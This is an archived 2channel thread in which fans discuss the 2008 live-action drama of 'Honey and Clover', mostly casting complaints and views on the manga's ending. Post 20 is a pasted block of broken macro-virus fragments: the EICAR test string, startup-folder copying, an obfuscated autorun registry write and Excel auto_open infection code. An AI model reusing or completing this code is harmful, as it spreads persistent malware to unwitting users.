2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

羽海野チカ「ハチミツとクローバー」その63

1 :花と名無しさん:2007/11/08(木) 16:17:22 ID:???0
◆ 連続ドラマ…来年1月期フジ放送予定 ◆

◆ コミックス第10巻…9月8日発売 ◆
◆ アニメ第2部…放送終了 ◆
◆ 映画…一部上映中 ◆
※ドラマ、アニメ、映画の話題はそれぞれ専用のスレがあるのでそちらでどうぞ(>>2-3参照)※
★ このスレはsage進行です ※メール欄に半角で「 sage 」と記入。これ重要※
★ 荒らし・煽りは完全無視 ※反応するアナタも同罪です。これ常識※
★ 風紀もほどほどに ※話題の流れを変えたかったら自分から別の話題を投下する。これ鉄則※

≪前スレ≫
羽海野チカ「ハチミツとクローバー」その62
http://anime2.2ch.net/test/read.cgi/gcomic/1181436073/
★ 過去ログ保管庫
http://www.geocities.jp/hachikuro2ch/
関連スレ、頻出質問事項等は>>2-20あたりに

2 :花と名無しさん:2007/11/08(木) 16:22:39 ID:???0
<<関連スレ>>

●テレビドラマ板
【火9】ハチミツとクローバーPart2【成海】
http://ex21.2ch.net/test/read.cgi/tvd/1194495463/
●アニメ2板
ハチミツとクローバー chapter.15 【ハチクロ】
http://anime2.2ch.net/test/read.cgi/anime2/1151432641/
●映画板
◇◆ハチミツとクローバー 5◇◆
http://tv11.2ch.net/test/read.cgi/cinema/1173160968/
●美術系学校板
美大生なら「ハチミツとクローバー」見るよな?
http://school7.2ch.net/test/read.cgi/design/1123050584/
●一人暮らし板
ハチミツとクローバー
http://life8.2ch.net/test/read.cgi/homealone/1159710526/

3 :花と名無しさん:2007/11/08(木) 16:26:02 ID:???0
≪公式サイト≫
ハチクロ連載中コミック誌「コーラス」
h ttp://chorus.shueisha.co.jp
作者(羽海野チカ)
h ttp://www13.plala.or.jp/umino
アニメ
h ttp://www.hachikuro.net
映画
h ttp://hachikuro.jp

≪頻出質問事項≫
Q.花本はぐみは、花本修司の姪ですよね?
A.違います。花本修司のいとこの娘です。※映画でのみ「姪」設定となっています

Q.登場キャラクターの身長の設定はどうなってますか?
A.[はぐ 145cm][山田 167cm][竹本 174cm][森田 179cm][真山 181〜182cm]

4 :花と名無しさん:2007/11/08(木) 16:41:46 ID:???0
1000 :花と名無しさん:2007/11/08(木) 16:33:27 ID:???0
1000ならドラマ版ラスト大改変

GJ!


>>1乙。

5 :花と名無しさん:2007/11/08(木) 17:39:45 ID:yudXQgMD0
ドラマ化では原作ラストを替えてほしい

はぐ→竹本か森田とくっつく
花本→リカとくっつく
真山→山田とくっつく

野宮は映画でもいなかったから、省いてしまってもいい。

6 :花と名無しさん:2007/11/08(木) 18:08:00 ID:???0
原作と変えてほしいって思っちゃうよねえ。
普通なら原作通りにやってほしいと思うものなんだろうけど・・・

7 :花と名無しさん:2007/11/08(木) 18:10:05 ID:???0
キャストさえイメージにあってれば、の前提だけどな>原作改変

8 :花と名無しさん:2007/11/08(木) 18:20:08 ID:???O
原作どうりだったら、ドラマしかみたことない
人々も、ハァ?な気分を味わえるね


9 :花と名無しさん:2007/11/08(木) 18:22:59 ID:???0
もうキャストは決まってるし何言っても変わらないから仕方ないけど
ドラマラストの〆はまだ決まってないだろうから
好きさ(ry〜をどうにかしてくれたら私は満足かも。

10 :花と名無しさん:2007/11/08(木) 18:24:52 ID:yudXQgMD0
好きさ(ry〜の破壊力は凄かった。
アニメで見てもきつかったものを
実写ドラマでやると、キツさ倍増だけど
花本役が作者お気に入りの堺だったら
やりそうだ。

11 :花と名無しさん:2007/11/08(木) 18:24:53 ID:???0
ドラマラストは誰ともくっつかないで欲しいな


12 :花と名無しさん:2007/11/08(木) 18:26:47 ID:???0
>>7
キャラがイメージに合って、まんま修はぐやられるのと
キャラはイメージ合わなすぎだけど原作の不満部分を改善してくれるの
どっちがいいんだろうなぁ。

まさに究極の選択かな?

13 :花と名無しさん:2007/11/08(木) 18:27:02 ID:???0
エースを狙えはドラマでも
30代の内野宗像が、10代の上戸ひろみへの愛を表明してたけど
キモさは微塵もなく、むしろ感動さえしたけどね。

14 :花と名無しさん:2007/11/08(木) 18:29:19 ID:???0
>>12
どっちだろうね

キャラがそこそこイメージにあって、原作の不満部分を改善してるけど、
オリジナル要素ぶち込みすぎで原作ヲタ涙目 なドラマも最近あったからなあ

15 :花と名無しさん:2007/11/08(木) 18:33:46 ID:???0
イメージに合うキャラで、不満部分改善がいいw
竹本は失恋でいいかな。それでこそ竹本。
はぐは森田とくっつくのがいいと思う。

>>14
ちなみにそれなんてドラマ?

16 :花と名無しさん:2007/11/08(木) 18:36:05 ID:???0
成海ってスゴイな〜
年は15歳だわ目力強いわメチャクチャやね

17 :花と名無しさん:2007/11/08(木) 18:46:33 ID:???0
>>15
多分イケパラ
原作にある主人公のストーカー要素をなくしたところはGJだったから



18 :花と名無しさん:2007/11/08(木) 18:46:58 ID:???0
>>16
でも食わず嫌いで見た時は、やっぱ年相応に子供に見えたよ。
だから結構可愛く演じてくれそうで期待してるんだけど。

19 :花と名無しさん:2007/11/08(木) 18:48:31 ID:???O
>>14
山田太郎のことかwww

20 :花と名無しさん:2007/11/08(木) 18:48:40 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


21 :花と名無しさん:2007/11/08(木) 18:49:12 ID:???0
イケパラかーw
花君は原作ヲタがほとんどいなくて
作者アンチばかりっていう印象だからなー。

でもここも最終回前から厳しい意見が増えたね。

22 :花と名無しさん:2007/11/08(木) 18:53:58 ID:???0
キャストはもうこの際諦めたw
脚本と演出がしっかりしててハチクロっぽさが出てればそれでいいや
演技面では成海と生田じゃそんなに心配することもなさそうだし

だけどジャニーズがいると公式サイトが地味になるのが嫌なんだよな

23 :花と名無しさん:2007/11/08(木) 19:10:27 ID:???0
最近、ジャニーズでも写真を加工したりFlashにしたりで
写真使われるようになってきてるから大丈夫じゃない?
今やってるドラマだと、有閑倶楽部とか。

24 :花と名無しさん:2007/11/08(木) 20:48:26 ID:???O
山田太郎は二宮が目があっただけで目眩がする美形の設定とそぐわない=キャスティングミス
桜井(竹本くん)のお坊ちゃんはまあまあかな
ドラマ終了後、原作から原案になったよ。
視聴率は一応花君に次いでたにも関わらず。

花君の作者は、筋金入りのジャニヲタだからドラマの大ヒットを大喜んでたけど、『イケメン♂パラダイスは描いてない』とブログに書いてもいたよ


ウミノさんはなんでもマンセーする人なんだっけ…
一発屋さんだとしても、既に力を持ってなくもなさそうだけど…

25 :花と名無しさん:2007/11/08(木) 21:06:12 ID:???O
修はぐは修が親心ではぐと竹本の邪魔をしてたことも
ラストのせいで肉欲による嫉妬だったのかよ…に変わってしまったのが気持ち悪かった。

26 :花と名無しさん:2007/11/08(木) 21:42:44 ID:???0
森田とはぐが仲よさげなのにショック受けたのも
はぐに近づく下級生たちをけん制したのも
竹本の邪魔をしたのも
父性愛だったと思ってた。
あの「好きさ」を聞いてからはおっさんの異性愛の独占欲かとわかってキモイ。

27 :花と名無しさん:2007/11/08(木) 22:05:07 ID:???O
作者はまた誰かと対談しそうだな。堺とのみたいに。

28 :花と名無しさん:2007/11/08(木) 22:11:35 ID:???0
とりあえず少女漫画家はみんなミーハーだな

のだめの作者みたいに作品を大事にしろよ

29 :花と名無しさん:2007/11/08(木) 22:20:06 ID:???0
修モンゴルで寝込むとか帰国後のスリスリとか、
森田とキスした後の文字化けとか、目の下に隈とか
ギャグ+父性だと思ってた(多分当時は本当にそうだった)から楽しく読めたのに・・・orz

30 :花と名無しさん:2007/11/08(木) 22:23:40 ID:???0
>>28
あれもミーハーじゃん

31 :花と名無しさん:2007/11/08(木) 22:30:27 ID:???0
最初は修はぐエンドの予定じゃなかったよね、絶対。
やっぱり堺さん萌えのせいなの?

32 :花と名無しさん:2007/11/08(木) 22:35:05 ID:???0
実写化を承諾する漫画家は間違いなくミーハー


33 :花と名無しさん:2007/11/08(木) 22:46:41 ID:???0
そんな無茶な・・・

34 :花と名無しさん:2007/11/08(木) 22:47:27 ID:???0
のだめの人はジャニーズだけは断固拒否したんでしょ

35 :花と名無しさん:2007/11/08(木) 23:27:36 ID:???O
一話の撮影終えてたにも関わらず
千秋(ジャニ岡田)ばかりが目立ってのだめが完全脇
しかもジャニ主題歌に作者が切れて一度白紙になったって聞いた<のだめ
急遽代わりに作った花男が超ヒット、のだめも後に月9で良作になり、ジャニーズ以外は万々歳の結果になったね

大ファンは色々思うところはあるかもしれないけど
花男、のだめ、ライフはかなり原作に忠実&キャスティングもよかったと思う
花君も堀北瑞希と小栗佐野、知らないジャニーズの中津でイケ♂パラとか、前評判は必ずしも高くなかったし最初は視聴率もそこそこだった
どうかハチクロも、原作とは半分別物でもいいから、いい意味で裏切ってほしい…

36 :花と名無しさん:2007/11/08(木) 23:58:36 ID:???0
医龍2くらいのはっちゃけぶりでもいいとか?

37 :花と名無しさん:2007/11/09(金) 00:00:41 ID:???0
映画よりずっと面白くなりそうで期待してるよ。
蒼井のはぐは評判いいけど、私はちょっとイラッときた。
成海なら少女ならではのピュアさで計算っぽくならないだろうと思ってる。

38 :花と名無しさん:2007/11/09(金) 00:31:37 ID:???0
のだめの人はドラマ化率がものすごく高いけど全て改悪されてきたからね。
それでもいままでの作品は趣味の延長みたいなのが多かったけど
のだめは取材したりと力を入れてきた作品。
だからこそ改悪は許せなかったんだろう。

働きマンも伊藤美咲とジャニだったけど作者がイメージ違うって断ったって話しあったね。
でも、カンノもどーよと思う。

ハチクロは原作の最後がダメダメなのでアレ以上悪く作れないと思う

39 :花と名無しさん :2007/11/09(金) 00:39:11 ID:???0
働きマンは伊藤美咲がダメだったんじゃなくて、原作にない年下の社員との
恋愛要素を入れると言われて拒否したって聞いた。
その代わりに、サプリが犠牲に…。

40 :花と名無しさん:2007/11/09(金) 02:10:20 ID:???O
>>38
正直、しんじ以外のキャストはピッタリだと(ry

41 :花と名無しさん:2007/11/09(金) 08:00:32 ID:???0
のだめの人はジャニ歌を拒否しただけでキャスト自体はOKしてたし
花男は代わりに作ったんじゃなく、元々1月期に企画されてたのが
繰り上げになっただけだぞ

42 :花と名無しさん:2007/11/09(金) 08:33:26 ID:???0
二ノ宮は、天才ファミリーでジャニの二宮に作品台無しにされてるからな

43 :花と名無しさん:2007/11/09(金) 08:44:47 ID:???0
のだめの話はこの際どうでもいい

44 :花と名無しさん:2007/11/09(金) 08:44:55 ID:???0
>>38
働きマンは松たかこ説もある
まあ伊東美咲も松たかこもないけど菅野もないなー

のだめやライフレベルじゃなくてもいいから花男くらいは原作リスペクトして欲しい

イケ♂パラは原作つまんなかったからあれでいいけど、
ハチクロはさすがにもうちょっとちゃんと作って欲しい

45 :花と名無しさん:2007/11/09(金) 09:02:27 ID:???0
原作なんてそっちのけで、単なる美大ドラマになると思うけどね
音大やって、次、農大やって、今度は美大

46 :花と名無しさん:2007/11/09(金) 09:55:34 ID:???0
>>45
なるほど

47 :花と名無しさん:2007/11/09(金) 11:11:52 ID:???0
最終回は四つ葉のクローバーが挟まれ、ハチミツが塗られた食パンを
見た竹本が涙を浮かべて・・・

「・・・・こんなの食えるかよw」

48 :花と名無しさん:2007/11/09(金) 12:22:58 ID:???0
>ハチクロは原作の最後がダメダメ

ドラマを見た視聴者にも、あの脱力感を経験させてあげよう。

49 :花と名無しさん:2007/11/09(金) 12:23:23 ID:???O
>>45
音大と農大の作品のクオリティ違いすぎWW
農大は真面目に作られてるんだかそうでないんだかわからなかった

50 :花と名無しさん:2007/11/09(金) 12:38:00 ID:???0
大学生モノブーム来るな

51 :花と名無しさん:2007/11/09(金) 12:41:57 ID:???O
手を怪我せず、でも自らの意志でフランスに留学するラストで
誰ともくっつかないor森田か竹本とほんのりくっつく(一緒に行かれても困る)ラストになってくれるなら
あのヒロインでもいいや


そしたらクローバーサンドもできなくなるかもしれないし
原作というより原案になってしまうけど…

52 :花と名無しさん:2007/11/09(金) 12:45:19 ID:???0
のだめの人の農家物も酷かった品。

ライフはなっちゃんが飛び降りるアングルが神だった。
ハチクロドラマもあゆに蹴られて屋上から落ちていく森田をきちんと表現してほしい。


53 :花と名無しさん:2007/11/09(金) 12:46:44 ID:???0
山田さんが真山より幸せになれるラストならそれでいい。

54 :花と名無しさん:2007/11/09(金) 12:52:13 ID:???0
>>52
GREENだっけ
アブナイ放課後 の改悪ばっか言われてるけど
作者はGREENのドラマにもお怒りだったらしいな

そりゃのだめは慎重になるに決まってる罠

55 :花と名無しさん:2007/11/09(金) 13:34:22 ID:???0
のだめの話はもういい

56 :花と名無しさん:2007/11/09(金) 14:11:38 ID:???0
>>54
NHKで深田恭子が主演したアレなw
だって初回の設定から別物だったしな。

57 :花と名無しさん:2007/11/09(金) 21:15:01 ID:???O
成海ってはぐと正反対だと思う

58 :花と名無しさん:2007/11/10(土) 03:50:05 ID:???0
>>57
成海さんのお友達ですか?

59 ::2007/11/10(土) 13:07:42 ID:xflUoENQ0
「ハチミツとクローバー」ドラマ化に議論紛糾
http://news.ameba.jp/hl/2007/11/8437.html

60 :花と名無しさん:2007/11/11(日) 10:16:57 ID:???0
成海璃子が“飛び級”女子大生に挑戦って

はぐが飛び級設定だったらいや過ぎるw

61 :花と名無しさん:2007/11/11(日) 10:55:18 ID:???0
そもそも、はぐって第一印象「キリっとした」って感じじゃないだろ。
生み出した作者が自分のキャラのその当たり拘らなくて、
役者のいいとこ褒めてどうするの…。
メディア化されればなんでもいいのかなあ。
好きで作品読んでる読者の事も少しは考えてくれればいいのに。

62 :花と名無しさん:2007/11/11(日) 13:30:00 ID:???0

【成海】ハチミツとクローバー3枚目【生田】
http://ex21.2ch.net/test/read.cgi/tvd/1194688205/l50

63 :花と名無しさん:2007/11/11(日) 14:31:17 ID:???0
>>60
第一、日本に飛び級制度はないよ。

64 :花と名無しさん:2007/11/11(日) 14:56:18 ID:???0
ごく一部だけど日本にもあるよ。
大学大学院だけみたいだが。

65 :花と名無しさん:2007/11/11(日) 16:23:23 ID:???0
はぐって一見かわいくはかなげに見えるけど
物貰って「ありがとう」もいえないイヤな子なんだよね。


66 :花と名無しさん:2007/11/11(日) 17:41:43 ID:???0
漫画全巻よんで思ったけど
りかと真山(もとだんな)、はぐと修ちゃんのように
この原作者は才能あるけど社会には適合できない不器用で繊細なヒロインが
都合いいくらいヒロインのどんな傷も受け入れてくれる大人な理解者と
くっつくのが好きなんだと思う。芸術家側からみればそうだろうなと思う。

67 :花と名無しさん:2007/11/11(日) 17:45:36 ID:???0
相手が森田や竹本だとはぐは成長を待ったり
傷つけあったり支えあう必要がある。
そういうとこを全部放棄するはぐをあんまりスキになれなかった。
はぐにとってはそこまでして自分の創作生活を大切にしたかったんだろうけど。


68 :花と名無しさん:2007/11/12(月) 00:57:25 ID:???0
はぐ役はあたしがやりたかったな・・


69 :花と名無しさん:2007/11/12(月) 07:49:51 ID:???0
いきなり面白いこと書くなw

70 :花と名無しさん:2007/11/13(火) 00:27:46 ID:???0
やっぱスピッツがよく合うね。
贅沢は言わないからとにかく雰囲気に合ってるのを頼みたい。
http://www.nicovideo.jp/watch/sm1427015
アーティスト全然違うけど雰囲気合ってるから良いと思う例↓
http://www.nicovideo.jp/watch/sm762491
http://www.nicovideo.jp/watch/sm979048
山田の性格ってどうなるんだろう。
鉄人か終盤の乙女化か。


71 :花と名無しさん:2007/11/13(火) 01:43:31 ID:???O
>>66
つまり原作がああなったのは
作者が堺さんに萌えたせいでラストが改変されてしまったというよりも
作者のDNAに元からああいうパターンが刷り込まれていたからとも考えられるのか・・・
連載開始時には修ちゃんとくっつくなんて作者も考えてなかっただろうけれど
物語の着地点を決めなくてはいけなくなった時、
究極の選択で作者が本能的に選んだのは彼だったと・・・


72 :花と名無しさん:2007/11/13(火) 03:46:48 ID:???0
>>66
女が芸術家として成功しようと思ったらそういう選択になるかもね。
女に母親の役目を求めるような男性は大変だし、
ボロボロになるほど傷つけ合うような相手では創作活動に没頭出来なくて、邪魔になる。
相手が同じ芸術家っていうのも嫉妬したり何かと難しい。
サポートしてくれる相手じゃないと、そういった活動を女がしていくのは難しい。

ロリな見た目のせいでキモイと思われがちだけど、よく考えたら賢い選択かもしれないと思う。

73 :花と名無しさん:2007/11/13(火) 15:27:16 ID:2TI0Yh3K0
>>5
ドラクエ4PS版で 
第六章でデスピサロを仲間にしてロザリーを生き返らせたみたいな
チープな話になりそうだなw

74 :花と名無しさん:2007/11/13(火) 15:35:19 ID:2TI0Yh3K0
>>45
農大ドラマなんていつやった?
今ノイタミナ(ハチクロ のだめ 働きマンのアニメをやった番組)で
もやしもん やってるから いずれこれがドラマ化するのは確実だけど

75 :花と名無しさん:2007/11/13(火) 15:36:42 ID:2TI0Yh3K0
>>47
違う

最後は 雑菌まみれの野草とハチミツの組み合わせによりボツリヌス菌が大繁殖
そして竹本は食中毒になって涙を流す

76 :花と名無しさん:2007/11/13(火) 15:38:25 ID:???0
>>74
7月クール。牛に願いを

77 :花と名無しさん:2007/11/13(火) 15:41:16 ID:2TI0Yh3K0
>>71-72

しゅうちゃんとはぐちゃんって
なんか


小朝とヤスハに似てる・・・・


78 :花と名無しさん:2007/11/13(火) 15:44:25 ID:2TI0Yh3K0
>>76
やったといえばやったになるのだろうけど
何か違う気が・・・


79 :花と名無しさん:2007/11/13(火) 15:47:46 ID:???0
>>78
素直な方が可愛いぞ

80 :花と名無しさん:2007/11/13(火) 16:58:58 ID:???0
やったとかやらないとか
記憶がなくなるまで呑んだ日の朝じゃないんだから
どーでもいいべ

81 :花と名無しさん:2007/11/13(火) 19:10:17 ID:???0
プッww

82 :花と名無しさん:2007/11/13(火) 19:33:04 ID:???0
牛はハチクロやりたいんだろうな〜って思ってみてた
まさか本気で本家がドラマ化するとは思わなかった

83 :花と名無しさん:2007/11/13(火) 20:35:57 ID:???O
>>74
のだめはドラマの後じゃなかった?

84 :花と名無しさん:2007/11/14(水) 00:08:28 ID:???0
プロ大と牛に願いをはハチクロを彷彿とさせる青春群像劇だね
ドラマでやるならプロ大みたいに主人公とヒロインをはっきりさせないと
ぼやけて成功しにくい
ハチクロは牛に願いをコースで低視聴率な予感・・

85 :花と名無しさん:2007/11/14(水) 04:24:12 ID:???0
>84
テーマで押しの弱い分、蛇二とかナルミで視聴率稼ぎですよ。
役者目当てのヤツは内容どうでもいいもん。

86 :花と名無しさん:2007/11/15(木) 17:05:07 ID:???0
ウミノさんてハチクロ以降どうなの?
ハチクロで終わっちゃった感じなのかな。

87 :花と名無しさん:2007/11/15(木) 17:34:05 ID:???0
>86
羽海野チカ / 3月のライオン Chapter.2
http://anime2.2ch.net/test/read.cgi/comic/1189413115/l50

88 :花と名無しさん:2007/11/15(木) 19:09:09 ID:SuYAEHYh0
もし修役がふたたび堺だったら
原作と同じラストになると覚悟する。

89 :花と名無しさん:2007/11/15(木) 19:32:44 ID:???0
15歳の子相手に犯罪だねw

90 :花と名無しさん:2007/11/15(木) 22:07:25 ID:???O
まあ堺と成海、並んで違和感はあんまり感じないが…堺は大河があるしないだろうなぁ。
ドラマ板では藤木の名前が出てたが…なんかありえそう

91 :花と名無しさん:2007/11/16(金) 09:37:14 ID:???0
大河も主演じゃない以上、並行してドラマ出演してる俳優さん多いよ。
今期の風林火山なら
今川義元の中の人なんて、ドラマ2,3本掛け持ちしてるし。

92 :花と名無しさん:2007/11/17(土) 13:02:51 ID:???O
映画と同じキャストなんかありえねーよ
普通に考えりゃわかるだろw

93 :花と名無しさん:2007/11/17(土) 14:23:08 ID:???O
ハチクロに限らず、そういうパターンは絶対ありえないとは言えないが。

94 :花と名無しさん:2007/11/17(土) 17:28:08 ID:???O
>>91
それじゃ谷原でいいじゃん。

95 :花と名無しさん:2007/11/17(土) 23:18:09 ID:???O
>>94
谷原あり得るかも!

確か、何期も連続でドラマに出続けてらしいから1月期も出ると思うし。

96 :花と名無しさん:2007/11/18(日) 01:22:17 ID:???0
生田は顔が疲れてくると吸血鬼にしかみえないんだが・・

アニメ初回限定版の吸血鬼真山にお似合い




97 :花と名無しさん:2007/11/20(火) 23:59:29 ID:G2yOS8Q10
流れをきって悪いんですが、森田さんが花見で歌ってた
ズズズンズンズンズンドコ〜って歌CDになってるかわかる方いませんか?

98 :花と名無しさん:2007/11/22(木) 14:32:36 ID:???0
>>97
氷川きよしの「きよしのズンドコ節」じゃないの?

99 :花と名無しさん:2007/11/22(木) 21:23:13 ID:kNtrDLiL0
>>98
ズズズン ドンズドン ドンズドン でした(><)
ユーチューブで「森田の愛のズンドコ節」で出てくるやつです。。

100 :花と名無しさん:2007/11/22(木) 21:37:21 ID:???0
この作者には構成力がなかったの?
散々言われてるけど伏線は最初から張るって
インタビューで言ってたのにね

101 :花と名無しさん:2007/11/24(土) 01:00:34 ID:???0
いま読み返すとラストが悪いというよりも
1〜3巻あたりの修とはぐみの扱い方が悪いんじゃないか

最近ハチクロまとめて読んだ人にはラストはそんなに不評じゃないし
いっきに読むと当初の花本親子設定はごちゃごちゃしたギャグとして
みんな読みとばしてるような感じだ

ドラマでははぐのロリな感じやら修のお父さん的なギャグが
うまく改善されてかえっていい感じになるんじゃないか

102 :花と名無しさん:2007/11/25(日) 16:15:09 ID:???0
>>101
はぐが年相応の外見ならまだ許容できた人もいるとは思うけどね。
おんぶしている絵は小学校低学年の娘を持つ父親にしか見えないし。

自分は結末を知った上で読み始めて、
初期の親子描写に多少違和感はあったけど最後は感動できた。
まぁ確実に言えるのは親子描写を描いている段階では確実に修エンドは考えてなかっただろうなと
いうことだけだね。


103 :花と名無しさん:2007/11/25(日) 16:22:44 ID:???0
最後感動できたのは竹本にであって
臭はぐではないな。
自分は

104 :花と名無しさん:2007/11/25(日) 20:26:39 ID:???0
羽海野さん、NHK−FMに出てる

105 :花と名無しさん:2007/11/26(月) 22:51:50 ID:eREnsP830
ドラマのハチクロのキャスティングだいたいでたよー

ハグ=成宮璃子
竹本=生田斗真
山田=原田夏希
真山=向井理
森田=成宮寛貴
花本=村上淳
リカ=瀬戸朝香


あまりにも酷いキャスティング





106 :花と名無しさん:2007/11/26(月) 23:20:16 ID:???0
ミスキャストばっかりじゃん

107 :花と名無しさん:2007/11/26(月) 23:50:21 ID:???0
>>105
なんだこのフジのやる気のなさw

108 :花と名無しさん:2007/11/26(月) 23:57:25 ID:???0
>>105
イメージ合うの向井理だけだわ

109 :花と名無しさん:2007/11/27(火) 00:29:23 ID:???0
>>105
orz

110 :花と名無しさん:2007/11/27(火) 00:38:23 ID:???0
リカ=瀬戸朝香ってガタイ良すぎだろ…

111 :花と名無しさん:2007/11/27(火) 01:23:02 ID:???O
>>110
書こうとしたら、もう書いてあった。超同意
なんて骨太な梨花さんw。あゆよりずっと強そう。

アニメ・映画は悪くはなかったが、
ドラマはダメダメっぽいな。

112 :花と名無しさん:2007/11/27(火) 03:54:27 ID:???O
>>105
臭役が渋いな
これは臭はぐはない
嬉しいよ

113 :花と名無しさん:2007/11/27(火) 05:24:11 ID:???0
>>112
どんなフジ関係者?

114 :花と名無しさん:2007/11/27(火) 08:27:39 ID:L2MZenkoO
リカは原田知世か石田ひかりのお姉ちゃんが良かったのに…orz
すげー健康そうなリカ役だな
ガッカリ。

115 :花と名無しさん:2007/11/27(火) 09:38:31 ID:???0
よりによって何故瀬戸朝香www
ナンシー関にプロレスラーになって貰いたいって言われてなかったっけw

116 :花と名無しさん:2007/11/27(火) 10:02:15 ID:???0
真山以外は映画の方がぜんっぜん良い

117 :花と名無しさん:2007/11/27(火) 10:29:14 ID:???0
理花は
石田ゆり子
真木よう子
中谷美紀
吉瀬美智子

あたりがよかった
よりによって瀬戸朝香はねーよwwwwwwww

118 :花と名無しさん:2007/11/27(火) 10:31:36 ID:???0
瀬戸朝香は嫌いじゃないんだけどリカのイメージじゃないよなあ。
一人でバリバリ仕事出来て、周りを明るくしながら生きていけそうな人だもん。
もっとピンヒールみたいに折れそうな儚い感じじゃないとイメージ合わない…

119 :花と名無しさん:2007/11/27(火) 10:33:56 ID:???0
理花さんって山田やはぐに比べて
あいそうな女優さんたくさんいそうなのに

一番あわない瀬戸朝香か…気のつよそうなイメージ

120 :花と名無しさん:2007/11/27(火) 10:36:52 ID:???0
ドラマ班はもう原作のイメージに沿った作品を作ろうとは思ってないんじゃないか。
なるみりこが「はぐ」って時点でもうまったくの別物だもんな。

121 :花と名無しさん:2007/11/27(火) 10:54:20 ID:???0
どっちかって言うと山田役の原田夏希のほうが
リカっぽいよ。

122 :花と名無しさん:2007/11/27(火) 10:58:17 ID:???0
いやー微妙だなと思った映画のキャスティングの方が
ドラマより遥かに良く感じられる事態になるとはね

123 :花と名無しさん:2007/11/27(火) 11:19:50 ID:???O
映画公開時はまだハチクロ大好きだったからあのキャストでも嫌だったけど
今はもう原作に思い入れないからどんなキャストでもかまわないなw
ドラマ面白そうだよ有閑倶楽部の二の舞っぽくてw

124 :花と名無しさん:2007/11/27(火) 11:52:37 ID:???O
たっぷり時間があるぶん、
ギャグ部分の『漫画だから』、面白いことを
そのままやって寒いことになりそう。
ローマイヤ先輩とか芸大教授とか。

それとも天才の苦悩と青春の挫折とか
愛する人との別離とか家族との確執とか欝満載なのかな。

125 :花と名無しさん:2007/11/27(火) 11:55:32 ID:???0
有閑はネタとして見ようと思ってもキツくて見なくなったからなあ
ハチクロはただでさえ恥ずかしいエピ満載だから
よけい辛そう

126 :花と名無しさん:2007/11/27(火) 12:21:09 ID:???0
スタッフ見ても面白いドラマ作ってるようなラインナップじゃないしなあ…

127 :花と名無しさん:2007/11/27(火) 13:33:22 ID:???0
>>121
山田:成海
理花:原田
のほうがまだ納得できるな

128 :花と名無しさん:2007/11/27(火) 15:32:02 ID:???0
瀬戸は美和子さんでいいんじゃないか。

129 :花と名無しさん:2007/11/27(火) 16:28:42 ID:???0
村上淳ってUAの元旦那さんか。
修はぐは絶対なさそうで安心しました。

130 :花と名無しさん:2007/11/27(火) 17:23:19 ID:???0
今のムラジュン凄いぞ。老人みたいで


131 :花と名無しさん:2007/11/27(火) 18:25:11 ID:???0
>>129
ドラマのこの糞キャストなら
修はぐやろうが何やろうがかまわないよ
完全に原作と関係無い学芸会としてみれるから

132 :花と名無しさん:2007/11/27(火) 23:09:00 ID:???O
>>105
ことごとくハズレorz
>>114
リカはマジで石田ゆり子方が良かった

133 :花と名無しさん :2007/11/28(水) 15:14:58 ID:???0
瀬戸朝香にはあと15`ほど痩せてもらえばいいと思う

134 :花と名無しさん:2007/11/28(水) 15:18:11 ID:???0
 ◆出演
  花本はぐみ … 成海璃子
  竹本祐太 … 生田斗真
  山田あゆみ … 原田夏希
  真山 巧 … 向井 理
     ・    ・
  森田 忍 … 成宮寛貴
     ・    ・
  山田大五郎 … 泉谷しげる
  庄田教授 … 松重 豊
  寺登泰彦 … 前川泰之
     ・    ・
  野宮 匠 … 柏原 崇
     ・    ・
  勅使河原美和子 … 滝沢沙織
  花本修司 … 村上 淳
  原田理花 … 瀬戸朝香


135 :花と名無しさん:2007/11/28(水) 16:10:06 ID:???0
ドラマの話ならドマラ板にいけばいいのに。

136 :花と名無しさん:2007/11/28(水) 18:41:53 ID:???0
ミスキャストもいいところだな〜

137 :花と名無しさん:2007/11/28(水) 20:47:18 ID:???0
酷いキャスティング

138 :花と名無しさん:2007/11/28(水) 20:50:44 ID:???0
原作者これでよくOK出したよな。
もうメディアに取り上げられるなら何でもいいんだろうか。
自分の作品にもっとプライド持ってくれ。

139 :花と名無しさん:2007/11/28(水) 21:03:47 ID:???0
瀬戸朝香と滝沢沙織って配役逆にした方がまだよっぽどマシだよね

140 :花と名無しさん:2007/11/28(水) 23:09:19 ID:???0
酷い、酷すぎる

141 :花と名無しさん:2007/11/29(木) 00:19:06 ID:???0
>>139
同意

142 :花と名無しさん:2007/11/29(木) 03:54:47 ID:???0
のだめの人と違ってハチクロの人なら何の話持っていっても全部OKもらえるYO!
って局側から思われてるんじゃないの
そこに作者のプライドやファンの気持ちはまったく無いんだろうな

143 :花と名無しさん:2007/11/29(木) 12:22:07 ID:???0
成海璃子と成宮寛貴はありえないよ。
使い方間違ってる。この二人は下手じゃないからかわいそう。

144 :花と名無しさん:2007/11/29(木) 12:42:22 ID:???0
はぐってほとんどセリフないよね?
人気の成海を使うんじゃセリフなしで他のキャラの周りで
存在してるだけの役ってわけには行かないと思うし
どういう展開をメインにドラマ作るつもりなんだろう。

145 :花と名無しさん:2007/11/29(木) 14:17:31 ID:???0
ほんとなんでもOKなんだな
自分の作ったキャラにこだわりとか皆無かよ

146 :花と名無しさん:2007/11/29(木) 16:16:48 ID:???0
身長差(高い順)

真山 巧 … 向井 理・182cm
野宮 匠 … 柏原 崇・178cm
花本修司 … 村上 淳・176cm
竹本祐太 … 生田斗真・173cm
